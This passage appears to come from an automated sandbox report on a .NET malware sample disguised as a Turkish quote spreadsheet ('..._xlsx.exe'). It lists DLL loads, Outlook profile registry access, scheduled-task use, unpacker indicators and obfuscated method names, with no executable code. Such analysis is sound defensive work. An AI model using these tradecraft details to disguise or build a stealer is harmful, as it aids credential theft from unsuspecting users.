Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: vamE.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr
Source:	Binary string: vamE.pdbSHA256 source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: YzkHZRBcm.exe.0.dr, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.cs	.Net Code: GYpIrLWauj System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.cs	.Net Code: GYpIrLWauj System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3374a04.0.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7c80000.5.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.cs	.Net Code: GYpIrLWauj System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_031DF508 push esp; iretd	0_2_031DF539
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC8541 pushad ; retf	0_2_07DC854D
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 0_2_07DC84E9 push esp; retf	0_2_07DC84F5
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133900B push edx; retf	9_2_01339012
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01339093 push ebp; retf	9_2_01339462
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01339091 push ebx; retf	9_2_01339092
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01339089 push ebx; retf	9_2_0133908A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133A088 pushad ; retf	9_2_0133A0EA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133A0EB pushad ; retf	9_2_0133A0F2
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_0133A0E8 pushad ; retf	9_2_0133A0EA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01339468 push esi; retf	9_2_0133961A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01338490 push edx; retf	9_2_01338EEA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01338481 push ecx; retf	9_2_01338482
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01339611 push edi; retf	9_2_01339612
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01339DE0 pushad ; retf	9_2_0133A02A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Code function: 9_2_01338EEB push edx; retf	9_2_01338EF2
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_0102F463 push esp; iretd	10_2_0102F539
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_051E9F40 push eax; mov dword ptr [esp], edx	10_2_051E9F54
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B7750 push esp; retf	10_2_071B775D
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 10_2_071B77A9 pushad ; retf	10_2_071B77B5
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Code function: 14_2_012B9C30 push esp; retf 0150h	14_2_012B9D55

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Static PE information: section name: .text entropy: 7.986844435005259
Source: YzkHZRBcm.exe.0.dr	Static PE information: section name: .text entropy: 7.986844435005259

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, fb6yvpsy14g5qhnfk0.cs	High entropy of concatenated method names: 'p4hGfKv758', 'CSCG6OxAhe', 'ToString', 'NiEGd2m8Vr', 'ydAG2e4I7P', 'VQbGPg5Jcw', 'O74GTnf35m', 'iw1GhaxxaK', 'l7bG7BXmHP', 'LYPGRrujTx'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, rtPNF2YwxlfdEVDxrl.cs	High entropy of concatenated method names: 'GAN7dExPKi', 'b307PMPUe1', 'k637hhNEMx', 'RwwhBW4Syn', 'KtmhzQSyVO', 'OBH74sqFhx', 'etn7XDI063', 'PgB7LGlfE1', 'TqX7jA5oby', 'TUQ7I4CfOi'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, W5VmDo6HmpAgbNZEiu.cs	High entropy of concatenated method names: 'SUUPeJkw3p', 'CKHPvmlX49', 'riCPgHNqd6', 'PpKP9pyFXx', 'CxkPpyhMR7', 'sBKPlFMr86', 'TUtPGycVFG', 'nv6PtOU4vp', 'YLUP5E0whf', 'yXEPZfDNTF'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.cs	High entropy of concatenated method names: 'JuyjqubICF', 'adGjdiT4VG', 'G1Lj2rg7J9', 'lFdjPqgoqu', 'APKjT2sUI9', 'a8AjhjZblb', 'gfIj73SfM2', 'VJMjRZG6is', 'DI3jwg3pOC', 'eqcjfcB2V2'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, mJTKhIVc7qJwtjTabI.cs	High entropy of concatenated method names: 'cTZ7J7cYNC', 'aDc7bubEX6', 'Gch7rof9kI', 'lXE7eJhLQ3', 'ImL7nb3ykE', 'r227vpCqua', 'X157D4IK4V', 'MCF7gwnQHe', 'XI679DETYL', 'fKZ7cqDSWp'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, FcY9ehqsfh4aVO4DAb.cs	High entropy of concatenated method names: 'D2q28UTrCE', 'Y2B2O1qNAl', 'UsS2aZpC1K', 'vLW2mjcXTs', 'CcM2QesN39', 'Hyi21AZKxl', 'CYk2Erijq4', 'vHf2SZEyva', 'q7F20ALLfy', 'uiZ2BWXMey'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, NfalMhJ8uA3kaHXvgn.cs	High entropy of concatenated method names: 'ToString', 'tdglMUaySS', 'BMclAsdFte', 'hYZlsxPYEP', 'MK1lkJ0diI', 'dCElo5YxH6', 'JQvl3uxecR', 'PrjlK7yYaC', 'k5TliNlb7R', 'QNRlyNnBHo'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, IjoMYfSa29sGRgq0j8.cs	High entropy of concatenated method names: 'vQWr8baQZ', 'Ccae7WApT', 'aVDv3Qkmf', 'aKGDdS7qC', 'Gbm9dAnY8', 'UHGciHeww', 'rtrMBYy51Dp9VwCUMs', 'Cv2kP3WWM0GKyRy3ht', 'z1Lt2Rrlf', 'NgAZ1LGLD'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, x64ZxoKhudRg3sF6Kl.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wOtL0N3Xg9', 'hH5LBRHur0', 'rd1LzlS6QM', 'iobj4TwJRY', 'DrrjXiHUKv', 'bHmjLl2JHQ', 'yMEjjykn2a', 'wQ5Z4AFKj0x1Du6XXWu'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, lq3FlorROTtpd8nMyY.cs	High entropy of concatenated method names: 'q9ZGSivXxZ', 'CK3GBVQrlu', 'mM5t4fJl6W', 'SsatXaa4E4', 'RLOGMNoVjD', 'NmyGUDJQmN', 'wppGYupSnp', 'lKOG8FVJIn', 'WYBGOsIjVA', 'nb8GaMKfFy'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, j7LYTtwUmq2kSe3mU3.cs	High entropy of concatenated method names: 'YbGtWNOd1L', 'FLKtAXxfNV', 'NvktsgnmsX', 'zPrtkVv3rI', 'PULt85cSZV', 'C6AtorPdhg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, ns7of4m4T22kQcU5Nm.cs	High entropy of concatenated method names: 'h0vTnik92O', 'CobTDtYk7S', 'T3YPsN1Bxi', 'oF1Pk8jW5X', 'Tw7Poq0ahL', 'SfwP3Np9tC', 'qZ0PKsuXGC', 'BKPPiCe7sB', 'V8hPytjm7x', 'OcjPFSVP1s'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, jO0gAth6LXQ4IqyJvc.cs	High entropy of concatenated method names: 'ztttdiG5AS', 'LpBt2Yvjvf', 'VKWtPm63Y6', 'khTtT9NcrD', 'TOAthuxFga', 'dUwt7S8BQe', 'dvKtR1d9M2', 'd8PtwQUkxy', 'EVZtfKRsy1', 'U7Lt6TFfu7'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, vqNN8YFCFfqQL6aBZ5H.cs	High entropy of concatenated method names: 'fav5JYFKUS', 'ono5bGF0xe', 'VH35rojooI', 'wss5eusTYN', 'bya5nAEG2Q', 'oLj5vGitbF', 'U5m5DdO3x0', 'SY85gBt50M', 'R3l591KDxO', 'GkI5cwHJe7'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, zCNwJdFnQu4puUFchct.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgbZ8cEKSB', 'zQ7ZO1706m', 'FY3Za5nCXY', 'IE3ZmF4FH5', 'kAiZQysu7M', 'YNIZ1BLPUI', 'wOGZEHPB8g'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, n6TEH8zCDlVl4HvvYO.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ih45NxkWDW', 'FP85psnaKW', 'AFc5lXeqND', 'elM5GeU4di', 'fPs5ttS2Ho', 'qqA55H9qyC', 'u9r5ZCPuaQ'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, rC3oiK5rTtspMSI9J1.cs	High entropy of concatenated method names: 'GbmhqLAXWQ', 'w4wh2ynJYM', 'hJFhT6AaXb', 'Rg1h7G0OA5', 'uHchRdmBID', 'I38TQIqQkZ', 'nBgT1pdIWE', 'SUNTEukURZ', 'lTETS1axwi', 'a27T00VZeI'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, kG4rDQDRSR9x8fka51.cs	High entropy of concatenated method names: 'Dispose', 'yWdX0a3wNK', 'AQ4LArR3fh', 'K1XxxJ42gs', 'wZ6XBNWLdj', 'OZcXzQ9FkL', 'ProcessDialogKey', 'xf6L4XVVO1', 'IF6LXbwoBN', 'fOWLLYVOFa'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, zOP9a9BGA3on5uXvvo.cs	High entropy of concatenated method names: 'mZkNgowxlj', 'UlFN9ov2pV', 'JXuNWWn3fw', 'fZvNAi3n7c', 'E4ZNkSpyP8', 'UTkNonhXMH', 'YqJNKgtGv4', 's1uNiPwjJv', 'K5gNFqPYE4', 'IkBNMrxgyM'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, oGQm8v3wF9JwNXXwVH.cs	High entropy of concatenated method names: 'SrZ5XE6Tc5', 'wTX5jTDwuF', 'jap5ILpo1Y', 'g7K5dho5Oh', 'XPE52Kenno', 'ugi5TBgvZ4', 'O7V5hYOpJb', 'T9ftEp89NG', 'GPmtSWNIel', 'u4bt0TceYG'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, nUhYvTMom9nagO8Sow.cs	High entropy of concatenated method names: 'o3MX74Mq04', 'uObXReINPD', 'dXTXfBGNYn', 'xPMX6BS3ud', 'u9mXp77NRW', 'KKxXlgLjdq', 'j84tDXVZHiSXNklwPH', 'cBkG1pzyl2MZiLtvHX', 'W0PXXS3Axk', 'UINXj94KpN'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, fb6yvpsy14g5qhnfk0.cs	High entropy of concatenated method names: 'p4hGfKv758', 'CSCG6OxAhe', 'ToString', 'NiEGd2m8Vr', 'ydAG2e4I7P', 'VQbGPg5Jcw', 'O74GTnf35m', 'iw1GhaxxaK', 'l7bG7BXmHP', 'LYPGRrujTx'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, rtPNF2YwxlfdEVDxrl.cs	High entropy of concatenated method names: 'GAN7dExPKi', 'b307PMPUe1', 'k637hhNEMx', 'RwwhBW4Syn', 'KtmhzQSyVO', 'OBH74sqFhx', 'etn7XDI063', 'PgB7LGlfE1', 'TqX7jA5oby', 'TUQ7I4CfOi'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, W5VmDo6HmpAgbNZEiu.cs	High entropy of concatenated method names: 'SUUPeJkw3p', 'CKHPvmlX49', 'riCPgHNqd6', 'PpKP9pyFXx', 'CxkPpyhMR7', 'sBKPlFMr86', 'TUtPGycVFG', 'nv6PtOU4vp', 'YLUP5E0whf', 'yXEPZfDNTF'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.cs	High entropy of concatenated method names: 'JuyjqubICF', 'adGjdiT4VG', 'G1Lj2rg7J9', 'lFdjPqgoqu', 'APKjT2sUI9', 'a8AjhjZblb', 'gfIj73SfM2', 'VJMjRZG6is', 'DI3jwg3pOC', 'eqcjfcB2V2'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, mJTKhIVc7qJwtjTabI.cs	High entropy of concatenated method names: 'cTZ7J7cYNC', 'aDc7bubEX6', 'Gch7rof9kI', 'lXE7eJhLQ3', 'ImL7nb3ykE', 'r227vpCqua', 'X157D4IK4V', 'MCF7gwnQHe', 'XI679DETYL', 'fKZ7cqDSWp'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, FcY9ehqsfh4aVO4DAb.cs	High entropy of concatenated method names: 'D2q28UTrCE', 'Y2B2O1qNAl', 'UsS2aZpC1K', 'vLW2mjcXTs', 'CcM2QesN39', 'Hyi21AZKxl', 'CYk2Erijq4', 'vHf2SZEyva', 'q7F20ALLfy', 'uiZ2BWXMey'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, NfalMhJ8uA3kaHXvgn.cs	High entropy of concatenated method names: 'ToString', 'tdglMUaySS', 'BMclAsdFte', 'hYZlsxPYEP', 'MK1lkJ0diI', 'dCElo5YxH6', 'JQvl3uxecR', 'PrjlK7yYaC', 'k5TliNlb7R', 'QNRlyNnBHo'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, IjoMYfSa29sGRgq0j8.cs	High entropy of concatenated method names: 'vQWr8baQZ', 'Ccae7WApT', 'aVDv3Qkmf', 'aKGDdS7qC', 'Gbm9dAnY8', 'UHGciHeww', 'rtrMBYy51Dp9VwCUMs', 'Cv2kP3WWM0GKyRy3ht', 'z1Lt2Rrlf', 'NgAZ1LGLD'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, x64ZxoKhudRg3sF6Kl.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wOtL0N3Xg9', 'hH5LBRHur0', 'rd1LzlS6QM', 'iobj4TwJRY', 'DrrjXiHUKv', 'bHmjLl2JHQ', 'yMEjjykn2a', 'wQ5Z4AFKj0x1Du6XXWu'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, lq3FlorROTtpd8nMyY.cs	High entropy of concatenated method names: 'q9ZGSivXxZ', 'CK3GBVQrlu', 'mM5t4fJl6W', 'SsatXaa4E4', 'RLOGMNoVjD', 'NmyGUDJQmN', 'wppGYupSnp', 'lKOG8FVJIn', 'WYBGOsIjVA', 'nb8GaMKfFy'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, j7LYTtwUmq2kSe3mU3.cs	High entropy of concatenated method names: 'YbGtWNOd1L', 'FLKtAXxfNV', 'NvktsgnmsX', 'zPrtkVv3rI', 'PULt85cSZV', 'C6AtorPdhg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, ns7of4m4T22kQcU5Nm.cs	High entropy of concatenated method names: 'h0vTnik92O', 'CobTDtYk7S', 'T3YPsN1Bxi', 'oF1Pk8jW5X', 'Tw7Poq0ahL', 'SfwP3Np9tC', 'qZ0PKsuXGC', 'BKPPiCe7sB', 'V8hPytjm7x', 'OcjPFSVP1s'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, jO0gAth6LXQ4IqyJvc.cs	High entropy of concatenated method names: 'ztttdiG5AS', 'LpBt2Yvjvf', 'VKWtPm63Y6', 'khTtT9NcrD', 'TOAthuxFga', 'dUwt7S8BQe', 'dvKtR1d9M2', 'd8PtwQUkxy', 'EVZtfKRsy1', 'U7Lt6TFfu7'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, vqNN8YFCFfqQL6aBZ5H.cs	High entropy of concatenated method names: 'fav5JYFKUS', 'ono5bGF0xe', 'VH35rojooI', 'wss5eusTYN', 'bya5nAEG2Q', 'oLj5vGitbF', 'U5m5DdO3x0', 'SY85gBt50M', 'R3l591KDxO', 'GkI5cwHJe7'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, zCNwJdFnQu4puUFchct.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgbZ8cEKSB', 'zQ7ZO1706m', 'FY3Za5nCXY', 'IE3ZmF4FH5', 'kAiZQysu7M', 'YNIZ1BLPUI', 'wOGZEHPB8g'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, n6TEH8zCDlVl4HvvYO.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ih45NxkWDW', 'FP85psnaKW', 'AFc5lXeqND', 'elM5GeU4di', 'fPs5ttS2Ho', 'qqA55H9qyC', 'u9r5ZCPuaQ'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, rC3oiK5rTtspMSI9J1.cs	High entropy of concatenated method names: 'GbmhqLAXWQ', 'w4wh2ynJYM', 'hJFhT6AaXb', 'Rg1h7G0OA5', 'uHchRdmBID', 'I38TQIqQkZ', 'nBgT1pdIWE', 'SUNTEukURZ', 'lTETS1axwi', 'a27T00VZeI'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, kG4rDQDRSR9x8fka51.cs	High entropy of concatenated method names: 'Dispose', 'yWdX0a3wNK', 'AQ4LArR3fh', 'K1XxxJ42gs', 'wZ6XBNWLdj', 'OZcXzQ9FkL', 'ProcessDialogKey', 'xf6L4XVVO1', 'IF6LXbwoBN', 'fOWLLYVOFa'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, zOP9a9BGA3on5uXvvo.cs	High entropy of concatenated method names: 'mZkNgowxlj', 'UlFN9ov2pV', 'JXuNWWn3fw', 'fZvNAi3n7c', 'E4ZNkSpyP8', 'UTkNonhXMH', 'YqJNKgtGv4', 's1uNiPwjJv', 'K5gNFqPYE4', 'IkBNMrxgyM'
